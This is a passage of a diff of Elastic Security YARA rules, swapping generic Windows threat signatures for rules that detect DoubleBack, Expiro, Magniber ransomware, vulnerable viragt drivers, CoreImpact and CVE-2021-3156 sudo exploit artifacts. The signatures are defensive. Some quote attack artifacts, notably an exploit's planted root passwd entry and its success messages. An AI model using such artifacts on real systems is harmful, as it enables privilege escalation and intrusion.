+ logic_hash = "c5b521cc887236a189dca419476758cee0f1513a8ad81c94b1ff42e4fe232b8e" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "8fb9fcf8b9c661e4966b37a107d493e620719660295b200cfc67fc5533489dee" - severity = 50 + fingerprint = "a1e20b699822b47359c8585ff01da06f585b9d7187a433fe0151394b16aa8113" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 54 68 61 74 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 } + $a = { 61 6E 64 65 6D 6F 20 73 68 69 72 61 6E 61 69 20 77 61 20 79 6F 2C } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Da0F3Cbb : FILE MEMORY +rule ELASTIC_Windows_Trojan_Doubleback_D2246A35 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Doubleback (Windows.Trojan.DoubleBack)" author = "Elastic Security" - id = "da0f3cbb-e894-48a3-9169-b011e7ab278d" - date = "2024-01-22" - modified = "2024-02-08" + id = "d2246a35-e582-4707-acd0-f04bb66df722" + date = "2022-05-29" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L1991-L2009" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b2c456d0051ffe1ca7e9de1e944692b10ed466eabb38242ea88e663a23157c58" - logic_hash = "262d0bbb69adde8c4c8645813b048f3aaa2dbcc83996606e7ca21c3edea2b5d8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DoubleBack.yar#L1-L31" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "03d2a0747d06458ccddf65ff5847a511a105e0ad4dcb5134082623af6f705012" + logic_hash = "2241d2c6e5b5896fe6f3b02cb1786c39fa620ee503c4585bd75c8763b6d3c06a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f50116e1f153d2a0e1e2dad879ba8bd6ac9855a563f6cbcbe6b6a06a96e86299" - severity = 50 + fingerprint = "949f8d30125fad133f4b897c945c6aa0eccda5456dc887bde4c0a5affece5195" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 8B 45 0C 53 56 83 F8 FF 57 8B F1 74 03 89 46 10 8B 7D 08 33 DB 3B FB 75 17 FF 76 04 E8 C6 09 00 00 59 89 5E 04 89 5E 0C 89 5E 08 E9 D9 00 00 00 8B 4E 04 3B CB 75 23 8D 1C 3F 53 E8 7E } + $s1 = "client.dll" ascii fullword + $s2 = "=i.ext;" ascii fullword + $s3 = "## dbg delay" ascii fullword + $s4 = "ehost" + $s5 = "msie" + $s6 = "POST" + $s7 = "%s(%04Xh:%u/%u)[%s %s]: %s" ascii fullword + $x64_powershell_msi_check = { 81 3C 39 70 6F 77 65 74 ?? 81 3C 39 6D 73 69 65 41 } + $x86_powershell_msi_check = { 81 3C 30 70 6F 77 65 74 ?? 81 3C 30 6D 73 69 65 6A 03 5A 0F } + $x64_salted_hash_func = { 8B 7D ?? 4C 8D 45 ?? 81 C7 ?? ?? ?? ?? 48 8D 4D ?? BA 04 00 00 00 89 7D ?? } + $x86_salted_hash_func = { 8B 75 ?? 8D 45 ?? 50 6A ?? 81 C6 ?? ?? ?? ?? 8D 4D ?? 5A 89 75 ?? } + $x64_guid = { 48 83 EC ?? 45 33 C9 41 B8 DD CC BB AA 45 8D 51 ?? } + $x86_guid = { 55 8B EC 83 EC ?? B8 DD CC BB AA 56 57 6A ?? 8D 75 ?? 5F } condition: - all of them + 5 of ($s*) or 2 of ($x64_*) or 2 of ($x86_*) } -rule ELASTIC_Windows_Generic_Threat_7D555B55 : FILE MEMORY +rule ELASTIC_Windows_Virus_Expiro_84E99Ff0 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Virus Expiro (Windows.Virus.Expiro)" author = "Elastic Security" - id = "7d555b55-20fb-42d4-b337-c267a34fd459" - date = "2024-01-22" - modified = "2024-02-08" + id = "84e99ff0-bff3-4a9c-93fb-504a32cbc44d" + date = "2023-09-26" + modified = "2023-11-02" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2011-L2029" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7efa5c8fd55a20fbc3a270cf2329d4a38f10ca372f3428bee4c42279fbe6f9c3" - logic_hash = "dc3a3622abbc7d0a02d8d9ed4446d0a72a603ecfd6594ecfa615e5418a9c9970" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Virus_Expiro.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "47107836ead700bddbe9e8a0c016b5b1443c785442b2addbb50a70445779bad7" + logic_hash = "ce4847bf5850c1f30dca9603bfbbfbb69339285f096ac469c6d2d4b04f5562b4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "eedf850c3576425fb37291f954dfa39db758cdad0a38f85581d2bcaedcb54769" - severity = 50 + fingerprint = "843182cbbf7ff65699001f074972d584c65bdb1e1d76210b44cf6ba06830253c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 40 53 56 57 6A 0F 59 BE 84 77 40 00 8D 7D C0 8B 5D 0C F3 A5 66 A5 8B CB 33 C0 A4 8B 7D 08 8B D1 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA 33 C0 8D 7D 0E 50 66 AB FF 15 BC 60 40 00 50 } + $a1 = { 50 51 52 53 55 56 57 E8 00 00 00 00 5B 81 EB ?? ?? ?? 00 BA 00 00 00 00 53 81 } + $a2 = { 81 C2 00 04 00 00 81 C3 00 04 00 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_0A38C7D0 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Viragt_5F92F226 : FILE { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Name: viragt.sys, Version: 1.80.0.0" author = "Elastic Security" - id = "0a38c7d0-8f5e-4dcf-9aaf-5fcf96451d3c" - date = "2024-01-22" - modified = "2024-02-08" + id = "5f92f226-053e-4a5b-8a0c-52a578f66cb8" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2031-L2049" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "69ea7d2ea3ed6826ddcefb3c1daa63d8ab53dc6e66c59cf5c2506a8af1c62ef4" - logic_hash = "e3fde76825772683c57f830759168fc9a3b3f3387f091828fd971e9ebba06d8a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Viragt.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53" + logic_hash = "e7ade7aec563c1dc602dfd7fda8c063058f47ae2a915959468792fce389b38f1" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "43998ceb361ecf98d923c0388c00023f19d249a5ac0011dee0924fdff92af42b" + tags = "FILE" + fingerprint = "544d7012478f31e9f9858ddb4463fa705bf8d50a97b5477557bd95e2d3d3b3ac" + threat_name = "Windows.VulnDriver.Viragt" severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 8B 4D 08 85 C9 74 37 8B 45 0C 3D E0 10 00 00 7C 05 B8 E0 10 00 00 85 C0 7E 24 8D 50 FF B8 AB AA AA AA F7 E2 D1 EA 83 C1 02 42 53 8B FF 8A 41 FE 8A 19 88 59 FE 88 01 83 C1 03 4A 75 F0 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 76 00 69 00 72 00 61 00 67 00 74 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x50][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x4f][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Windows_Generic_Threat_98527D90 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Viragt_84D508Ad : FILE { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Name: viragt64.sys, Version: 1.0.0.11" author = "Elastic Security" - id = "98527d90-90fb-4428-ab3f-6bbf23139a6e" - date = "2024-01-24" - modified = "2024-02-08" + id = "84d508ad-939d-4e3b-b9a6-204eb8bcaee5" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2051-L2069" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fa24e7c6777e89928afa2a0afb2fab4db854ed3887056b5a76aef42ae38c3c82" - logic_hash = "5a93f0a372f3a51233c6b2334539017df922f35a0d5f7d1749e0dd79268cb836" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Viragt.yar#L23-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495" + logic_hash = "a3e1b41155c7dd347976a1057cb763ab60c50c34e981fef050bd54f060a412fc" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "dac4d9e370992cb4a064d64660801fa165a7e0a1f4a52e9bc3dc286395dcbc91" + tags = "FILE" + fingerprint = "172be67b6bb07f189fd5e535e173d245114bf4b17c3daf89924a30c7219d3e69" + threat_name = "Windows.VulnDriver.Viragt" severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 20 FF D5 48 8D 87 0F 02 00 00 80 20 7F 80 60 28 7F 4C 8D 4C 24 20 4D 8B 01 48 89 DA 48 89 F9 FF D5 48 83 C4 28 5D 5F 5E 5B 48 8D 44 24 80 6A 00 48 39 C4 75 F9 48 83 EC 80 E9 8D 70 FC } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 76 00 69 00 72 00 61 00 67 00 74 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x0b][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Windows_Generic_Threat_Baba80Fb : FILE MEMORY +rule ELASTIC_Windows_PUP_Veriato_Fae5978C : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Pup Veriato (Windows.PUP.Veriato)" author = "Elastic Security" - id = "baba80fb-1d8a-424c-98e2-904c8f2e4f09" - date = "2024-01-24" - modified = "2024-02-08" + id = "fae5978c-f26c-4215-9407-d16e492ab5c1" + date = "2022-06-08" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2071-L2089" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dd22cb2318d66fa30702368a7f06e445fba4b69daf9c45f8e83562d2c170a073" - logic_hash = "ba0da35bc00b776ae9b427e3a4b312b1b75bdc9b972fb52f26a5df6737f1ddc9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_PUP_Veriato.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "53f09e60b188e67cdbf28bda669728a1f83d47b0279debf3d0a8d5176479d17f" + logic_hash = "8ae6f8b2b6e3849b33e6a477af52982efe137d7ebeff0c92cee5667d75f05145" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "71d9345d0288bfbbf7305962e5e316801d4a5cba332c5f4167f8e4f39cff6f61" - severity = 50 + fingerprint = "8d351cdd11d6dddc76cd89e7de9e65b28ef5c8183db804b2a450095e2f3214e5" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 0C 8B 4D 0C 53 56 57 8B 59 20 8D 71 20 8B F9 89 75 FC 85 DB 89 7D 0C 75 05 8B 59 24 EB 0C 8D 41 24 89 45 F8 8B 00 85 C0 75 30 8B 51 28 8B 41 2C 85 DB 74 03 89 53 28 85 D2 74 15 } + $s1 = "InitializeDll" fullword + $a1 = "C:\\Windows\\winipbin\\svrltmgr.dll" fullword + $a2 = "C:\\Windows\\winipbin\\svrltmgr64.dll" fullword condition: - all of them + $s1 and ($a1 or $a2) } -rule ELASTIC_Windows_Generic_Threat_9F4A80B2 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2021_3156_F3Fb10Cd : FILE CVE_2021_3156 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2021 3156 (Linux.Exploit.CVE-2021-3156)" author = "Elastic Security" - id = "9f4a80b2-e1ee-4825-a5e5-79175213da7d" - date = "2024-01-24" - modified = "2024-02-08" + id = "f3fb10cd-1d49-420f-8740-5c8990560943" + date = "2021-09-15" + modified = "2021-09-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2091-L2109" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "47d57d00e2de43f33cd56ff653adb59b804e4dbe37304a5fa6a202ee20b50c24" - logic_hash = "1df3b8245bc0e995443d598feb5fe2605e05df64b863d4f47c17ecbe8d28c3ea" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2021_3156.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "65fb8baa5ec3bfb4473e4b2f565b461dd59989d43c72b1c5ec2e1a68baa8b51a" + logic_hash = "cc80e0b2355877cd9ceecae19d4dcebb641d90a24c0751bf706134b31bf26750" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "86946aea009f8debf5451ae7894529dbcf79ec104a51590d542c0d64a06f2669" - severity = 50 + tags = "FILE, CVE-2021-3156" + fingerprint = "66aca7d13fb9c5495f17b7891e388db0a746d8827c8ae302a6cb8d86f7630bbb" + severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 0A 2A 20 02 00 00 00 FE 0E 08 00 00 FE 0C 08 00 20 00 00 00 00 FE 01 39 0A 00 00 00 00 20 01 00 00 00 FE 0E 08 00 00 FE 0C 08 00 20 02 00 00 00 FE 01 39 05 00 00 00 38 05 00 00 00 38 } + $a1 = "/usr/bin/sudoedit" fullword + $a2 = "" fullword condition: all of them } -rule ELASTIC_Windows_Generic_Threat_39E1Eb4C : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2021_3156_7F5672D0 : FILE CVE_2021_3156 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2021 3156 (Linux.Exploit.CVE-2021-3156)" author = "Elastic Security" - id = "39e1eb4c-32ba-4c78-9997-1c75b41dcba6" - date = "2024-01-24" - modified = "2024-02-08" + id = "7f5672d0-73f1-4143-b3e2-3aed110779e3" + date = "2021-09-15" + modified = "2021-09-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2111-L2129" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a733258bf04ffa058db95c8c908a79650400ebd92600b96dd28ceecac311f94a" - logic_hash = "d7791ae7513bc5645bcfa93a2d7bf9f7ef47a6727ea2ba5eb85f3c8528761429" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2021_3156.yar#L22-L45" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1a4517d2582ac97b88ae568c23e75beba93daf8518bd3971985d6a798049fd61" + logic_hash = "e25907f11a2f292441a96e19834ad89636593a3f8998ec0010e43830f5aa0c64" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "63d21d89b4ceea1fbc44a1dfd2dbb9ac3eb945884726a9809133624b10168c7a" - severity = 50 + tags = "FILE, CVE-2021-3156" + fingerprint = "71e90dd36342686bb4be7ef86e1ceb2e915c70f437f4733ddcc5175860ca4084" + severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 E4 F8 83 EC 6C 53 56 8B 75 08 57 8B C6 8D 4C 24 58 E8 26 80 00 00 8B C6 8D 4C 24 38 E8 1B 80 00 00 80 7C 24 54 00 8B 7E 0C 8B 5E 08 89 7C 24 1C 74 09 8B 74 24 50 E8 61 80 00 00 83 } + $a1 = "/tmp/gogogo123456789012345678901234567890go" fullword + $a2 = "gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash" fullword + $sudo = "sudoedit" fullword + $msg1 = "succes with sleep time %d us" fullword + $msg2 = "[+] Success with %d attempts" fullword + $msg3 = "symlink 2nd time success at: %d" fullword condition: - all of them + ( any of ($a*)) or ($sudo and 2 of ($msg*)) } -rule ELASTIC_Windows_Generic_Threat_D51Dd31B : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Magniber_Ea0140A1 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Ransomware Magniber (Windows.Ransomware.Magniber)" author = "Elastic Security" - id = "d51dd31b-1735-4fd7-9906-b07406a9d20c" - date = "2024-01-24" - modified = "2024-02-08" + id = "ea0140a1-b745-47f1-871f-5b703174a049" + date = "2021-08-03" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2131-L2150" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2a61c0305d82b6b4180c3d817c28286ab8ee56de44e171522bd07a60a1d8492d" - logic_hash = "85fc7aa81489b304c348ead2d7042bb5518ff4579b1d3e837290032c4b144e47" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Magniber.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a2448b93d7c50801056052fb429d04bcf94a478a0a012191d60e595fed63eec4" + logic_hash = "e2c05e2c92444d7bcb2bf68e97f809072d2ccdc8a171214d2e7a498b20d08f90" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "f313354a52ba8058c36aea696fde5548c7eb9211cac3b6caa511671445efe2a7" + fingerprint = "b3c17024097af846f800a843da404dccb6d33eebb90a8524f2f2ec8a5c5df776" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -107725,2234 +108100,2250 @@ rule ELASTIC_Windows_Generic_Threat_D51Dd31B : FILE MEMORY os = "windows" strings: - $a1 = { 7E 7D 7C 7B 7A 79 78 78 76 77 74 73 72 } - $a2 = { 6D 6C 6B 6A 69 68 67 66 65 64 63 62 61 60 60 5E 66 60 5B 5A } + $a1 = { 58 C0 FF 24 4C 8B F0 48 89 45 18 E8 E2 F5 FF FF B9 A1 BD D1 CF 48 89 45 B8 E8 D4 F5 FF FF B9 52 C6 D7 0E 48 89 45 F8 E8 C6 F5 FF FF B9 43 AC 95 0E 48 89 45 B0 E8 B8 F5 FF FF B9 78 D4 33 27 4C 8B F8 48 89 45 D0 E8 A7 F5 FF FF B9 FE 36 04 DE 48 89 44 24 50 E8 98 F5 FF FF B9 51 23 2E F2 48 89 45 10 E8 8A F5 FF FF B9 DA F6 8A 50 48 89 45 08 E8 7C F5 FF FF B9 AD 9E 5F BB 48 89 45 20 E8 6E F5 FF FF B9 2D 57 AE 5B 48 89 45 A0 E8 60 F5 FF FF B9 C6 96 87 52 48 89 45 C8 E8 52 F5 FF FF B9 F6 76 0F 52 48 89 45 A8 E8 44 F5 FF FF B9 A3 FC 62 AA 48 8B F0 48 89 45 98 E8 33 F5 } condition: - all of them + any of them } -rule ELASTIC_Windows_Generic_Threat_3A321F0A : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Magniber_97D7575B : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Ransomware Magniber (Windows.Ransomware.Magniber)" author = "Elastic Security" - id = "3a321f0a-2775-455f-b8c2-30591ebfe4ac" - date = "2024-01-29" - modified = "2024-02-08" + id = "97d7575b-8fc7-4c6b-8371-b62842d90613" + date = "2021-08-03" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2152-L2170" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "91056e8c53dc1e97c7feafab31f0943f150d89a0b0026bcfb3664d2e93ccfe2b" - logic_hash = "83834dd7d4df5de4b6a032f1896f52c1ebdf16ca8ad9766e8872243f1a6da67e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Magniber.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a2448b93d7c50801056052fb429d04bcf94a478a0a012191d60e595fed63eec4" + logic_hash = "9c85f98aaae28e9e90a94d6ce18389467013ea6b569f46f6acaf26a6c7e027fc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "230c3bbc70ec93888f5cd68598dcc004844db67f17d1048a51f6c6408bc4a956" - severity = 50 + fingerprint = "78253be69d9715892ec725918c3c856040323b83aeab8b84c4aac47355876207" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 44 8D 45 14 8B 4D 10 85 C9 89 5D F8 89 7D FC 0F 8E 3D 01 00 00 49 8D 55 17 83 E2 FC 89 4D 10 85 C9 8D 42 08 8B 58 F8 8B 78 FC 89 5D D4 89 7D D8 0F 8E 31 01 00 00 83 C2 0B 49 83 } + $a1 = { 00 4C 00 4C 00 20 00 59 00 4F 00 55 00 52 00 20 00 44 00 4F 00 43 00 55 00 4D 00 45 00 4E 00 54 00 53 00 20 00 50 00 48 00 4F 00 54 00 4F 00 53 00 20 00 44 00 41 00 54 00 41 00 42 00 41 00 53 00 45 00 53 00 20 00 41 00 4E 00 44 00 20 00 4F 00 54 00 48 00 45 00 52 00 20 00 49 00 4D 00 50 00 4F 00 52 00 54 00 41 00 4E 00 54 00 20 00 46 00 49 00 4C 00 45 00 53 00 20 00 48 00 41 00 56 00 45 00 20 00 42 00 45 00 45 00 4E 00 20 00 45 00 4E 00 43 00 52 00 59 00 50 00 54 00 45 00 44 00 21 00 0D } condition: - all of them + any of them } -rule ELASTIC_Windows_Generic_Threat_A82F45A8 : FILE MEMORY +rule ELASTIC_Multi_Trojan_Coreimpact_37703Dc3 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Multi Trojan Coreimpact (Multi.Trojan.Coreimpact)" author = "Elastic Security" - id = "a82f45a8-8e47-4966-9d48-9af61a21ac42" - date = "2024-01-29" - modified = "2024-02-08" + id = "37703dc3-9485-4026-a8b7-82e753993757" + date = "2022-08-10" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2172-L2190" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ad07428104d3aa7abec2fd86562eaa8600d3e4b0f8d78ba1446f340d10008b53" - logic_hash = "70ebab6b03af38ef8c81664cf49ab07066a9672666599d99c91291a9d2e3af0b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Trojan_Coreimpact.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2d954908da9f63cd3942c0df2e8bb5fe861ac5a336ddef2bd0a977cebe030ad7" + logic_hash = "0695f22d6eb8c1b335c43213087539db419562bebd6f5b948cbb168c454bd37c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e3a1faabc15e2767eb065f4e2a7c6f75590cba1368db1aab1af972a5aeca4031" - severity = 50 + fingerprint = "5a4d7af7d0fecc05f87ba51f976d78e77622f8afb1eafc175444f45839490109" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a1 = { 55 8B EC 51 89 4D FC 8B 4D 08 51 8B 4D FC 83 C0 04 E8 66 7D F6 FF 59 5D C2 08 00 90 55 8B EC 51 89 4D FC 8B 4D 08 51 41 51 8B 4D FC E8 CF FF FF FF 59 5D C2 04 00 8B C0 55 8B EC 83 C4 F8 53 56 } + $str1 = "Uh, oh, exit() failed" fullword + $str2 = "agent_recv" fullword + $str3 = "needroot" fullword + $str4 = "time is running backwards, corrected" fullword + $str5 = "junk pointer, too low to make sense" fullword condition: - all of them + 3 of them } -rule ELASTIC_Windows_Generic_Threat_D6625Ad7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bazar_711D59F6 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bazar (Windows.Trojan.Bazar)" author = "Elastic Security" - id = "d6625ad7-7f2c-4445-a5f2-a9444425f3a4" - date = "2024-01-29" - modified = "2024-02-08" + 